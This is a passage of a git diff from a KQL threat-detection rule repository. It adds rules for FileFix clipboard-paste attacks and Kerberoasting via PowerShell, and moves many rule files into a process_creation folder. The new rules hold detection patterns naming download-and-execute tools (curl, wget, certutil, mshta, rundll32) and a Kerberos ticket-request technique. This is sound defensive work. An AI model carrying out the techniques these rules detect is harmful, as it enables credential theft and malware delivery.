KQL/rules/windows/process_creation/suspicious_file_execution_from_internet_hosted_webdav_share.kql diff --git a/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql new file mode 100644 index 00000000..565e4e2b --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql @@ -0,0 +1,15 @@ +// Title: Suspicious FileFix Execution Pattern +// Author: 0xFustang, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-24 +// Level: high +// Description: Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation. +// This attack typically begins when users visit malicious websites impersonating legitimate services or news platforms, +// which may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content. +// The clipboard content usually contains commands that download and execute malware, such as information stealing tools. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004 +// False Positives: +// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools + +DeviceProcessEvents +| where (ProcessCommandLine contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")) and ((ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") or (ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "finger" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "schtasks" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "wscript")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql rename to KQL/rules/windows/process_creation/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql diff --git a/KQL/rules/Reconnaissance/suspicious_git_clone.kql b/KQL/rules/windows/process_creation/suspicious_git_clone.kql similarity index 100% rename from KQL/rules/Reconnaissance/suspicious_git_clone.kql rename to KQL/rules/windows/process_creation/suspicious_git_clone.kql diff --git a/KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql b/KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql rename to KQL/rules/windows/process_creation/suspicious_greedy_compression_using_rar_exe.kql diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql rename to KQL/rules/windows/process_creation/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql b/KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql rename to KQL/rules/windows/process_creation/suspicious_grpconv_execution.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql b/KQL/rules/windows/process_creation/suspicious_gup_usage.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_gup_usage.kql rename to KQL/rules/windows/process_creation/suspicious_gup_usage.kql diff --git a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql b/KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql rename to KQL/rules/windows/process_creation/suspicious_hh_exe_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql rename to KQL/rules/windows/process_creation/suspicious_high_integritylevel_conhost_legacy_option.kql diff --git a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql b/KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql rename to KQL/rules/windows/process_creation/suspicious_hwp_sub_processes.kql diff --git a/KQL/rules/Persistence/suspicious_iis_module_registration.kql b/KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_iis_module_registration.kql rename to KQL/rules/windows/process_creation/suspicious_iis_module_registration.kql diff --git a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql rename to KQL/rules/windows/process_creation/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql rename to KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution.kql diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql rename to KQL/rules/windows/process_creation/suspicious_invoke_webrequest_execution_with_directip.kql diff --git a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql rename to KQL/rules/windows/process_creation/suspicious_javascript_execution_via_mshta_exe.kql diff --git a/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql new file mode 100644 index 00000000..01f2f7e1 --- /dev/null +++ b/KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql @@ -0,0 +1,15 @@ +// Title: Suspicious Kerberos Ticket Request via CLI +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-18 +// Level: high +// Description: Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class. +// Threat actors may use command line interfaces to request Kerberos tickets for service accounts in order to +// perform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse +// techniques like silver ticket attacks. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Legitimate command line usage by administrators or security tools. + +DeviceProcessEvents +| where (ProcessCommandLine contains "System.IdentityModel.Tokens.KerberosRequestorSecurityToken" and ProcessCommandLine contains ".GetRequest()") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql rename to KQL/rules/windows/process_creation/suspicious_kernel_dump_using_dtrace.kql diff --git a/KQL/rules/Credential Access/suspicious_key_manager_access.kql b/KQL/rules/windows/process_creation/suspicious_key_manager_access.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_key_manager_access.kql rename to KQL/rules/windows/process_creation/suspicious_key_manager_access.kql diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql rename to KQL/rules/windows/process_creation/suspicious_lnk_command_line_padding_with_whitespace_characters.kql diff --git a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql similarity index 100% rename from KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql rename to KQL/rules/windows/process_creation/suspicious_manipulation_of_default_accounts_via_net_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_microsoft_office_child_process.kql diff --git a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_microsoft_onenote_child_process.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql rename to KQL/rules/windows/process_creation/suspicious_modification_of_scheduled_tasks.kql diff --git a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql rename to KQL/rules/windows/process_creation/suspicious_msbuild_execution_by_uncommon_parent_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql rename to KQL/rules/windows/process_creation/suspicious_msdt_parent_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql b/KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_mshta_child_process.kql diff --git a/KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql similarity index 100% rename from KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql rename to KQL/rules/windows/process_creation/suspicious_mshta_exe_execution_patterns.kql diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql rename to KQL/rules/windows/process_creation/suspicious_msiexec_embedding_parent.kql diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql rename to KQL/rules/windows/process_creation/suspicious_msiexec_execute_arbitrary_dll.kql diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql rename to KQL/rules/windows/process_creation/suspicious_msiexec_quiet_install_from_remote_location.kql diff --git a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql rename to KQL/rules/windows/process_creation/suspicious_mstsc_exe_execution_with_local_rdp_file.kql diff --git a/KQL/rules/Discovery/suspicious_network_command.kql b/KQL/rules/windows/process_creation/suspicious_network_command.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_network_command.kql rename to KQL/rules/windows/process_creation/suspicious_network_command.kql diff --git a/KQL/rules/Persistence/suspicious_new_service_creation.kql b/KQL/rules/windows/process_creation/suspicious_new_service_creation.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_new_service_creation.kql rename to KQL/rules/windows/process_creation/suspicious_new_service_creation.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql rename to KQL/rules/windows/process_creation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql diff --git a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql b/KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql rename to KQL/rules/windows/process_creation/suspicious_obfuscated_powershell_code.kql diff --git a/KQL/rules/Execution/suspicious_outlook_child_process.kql b/KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_outlook_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_outlook_child_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql rename to KQL/rules/windows/process_creation/suspicious_parent_double_extension_file_execution.kql diff --git a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql similarity index 100% rename from KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql rename to KQL/rules/windows/process_creation/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql diff --git a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql b/KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql rename to KQL/rules/windows/process_creation/suspicious_ping_del_command_combination.kql diff --git a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql b/KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql rename to KQL/rules/windows/process_creation/suspicious_plink_port_forwarding.kql diff --git a/KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql b/KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql rename to KQL/rules/windows/process_creation/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql diff --git a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql similarity index 100% rename from KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql rename to KQL/rules/windows/process_creation/suspicious_powershell_download_and_execute_pattern.kql diff --git a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql similarity index 100% rename from KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql rename to KQL/rules/windows/process_creation/suspicious_powershell_encoded_command_patterns.kql diff --git a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql similarity index 100% rename from KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql rename to KQL/rules/windows/process_creation/suspicious_powershell_iex_execution_patterns.kql diff --git a/KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql b/KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_powershell_invocations_specific_processcreation.kql rename to KQL/rules/windows/process_creation/suspicious_powershell_invocations_specific_processcreation.kql diff --git a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql rename to KQL/rules/windows/process_creation/suspicious_powershell_mailbox_export_to_share.kql diff --git a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql similarity index 100% rename from KQL/rules/Execution/suspicious_powershell_parameter_substring.kql rename to KQL/rules/windows/process_creation/suspicious_powershell_parameter_substring.kql diff --git a/KQL/rules/Execution/suspicious_powershell_parent_process.kql b/KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_powershell_parent_process.kql rename to KQL/rules/windows/process_creation/suspicious_powershell_parent_process.kql diff --git a/KQL/rules/Persistence/suspicious_process_by_web_server_process.kql b/KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_process_by_web_server_process.kql rename to KQL/rules/windows/process_creation/suspicious_process_by_web_server_process.kql diff --git a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/suspicious_process_created_via_wmic_exe.kql diff --git a/KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql rename to KQL/rules/windows/process_creation/suspicious_process_execution_from_fake_recycle_bin_folder.kql diff --git a/KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql b/KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_process_masquerading_as_svchost_exe.kql rename to KQL/rules/windows/process_creation/suspicious_process_masquerading_as_svchost_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_process_parents.kql b/KQL/rules/windows/process_creation/suspicious_process_parents.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_process_parents.kql rename to KQL/rules/windows/process_creation/suspicious_process_parents.kql diff --git a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql rename to KQL/rules/windows/process_creation/suspicious_process_patterns_ntds_dit_exfil.kql diff --git a/KQL/rules/Defense Evasion/suspicious_process_start_locations.kql b/KQL/rules/windows/process_creation/suspicious_process_start_locations.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_process_start_locations.kql rename to KQL/rules/windows/process_creation/suspicious_process_start_locations.kql diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql rename to KQL/rules/windows/process_creation/suspicious_processes_spawned_by_java_exe.kql diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql rename to KQL/rules/windows/process_creation/suspicious_processes_spawned_by_winrm.kql diff --git a/KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql b/KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql diff --git a/KQL/rules/Execution/suspicious_program_names.kql b/KQL/rules/windows/process_creation/suspicious_program_names.kql similarity index 100% rename from KQL/rules/Execution/suspicious_program_names.kql rename to KQL/rules/windows/process_creation/suspicious_program_names.kql diff --git a/KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_provlaunch_exe_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql diff --git a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql b/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_query_of_machineguid.kql rename to KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql diff --git a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql b/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql rename to KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql diff --git a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql similarity index 100% rename from KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql rename to KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql rename to KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql rename to KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql diff --git a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql b/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql rename to KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql diff --git a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql rename to KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql diff --git a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql similarity index 100% rename from KQL/rules/Impact/suspicious_reg_add_bitlocker.kql rename to KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql diff --git a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_reg_add_open_command.kql rename to KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql diff --git a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql rename to KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql rename to KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql diff --git a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql similarity index 100% rename from KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql rename to KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql diff --git a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql b/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql rename to KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql diff --git a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql b/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_runscripthelper_exe.kql rename to KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql diff --git a/KQL/rules/Execution/suspicious_scan_loop_network.kql b/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql similarity index 100% rename from KQL/rules/Execution/suspicious_scan_loop_network.kql rename to KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql rename to KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql rename to KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql rename to KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql 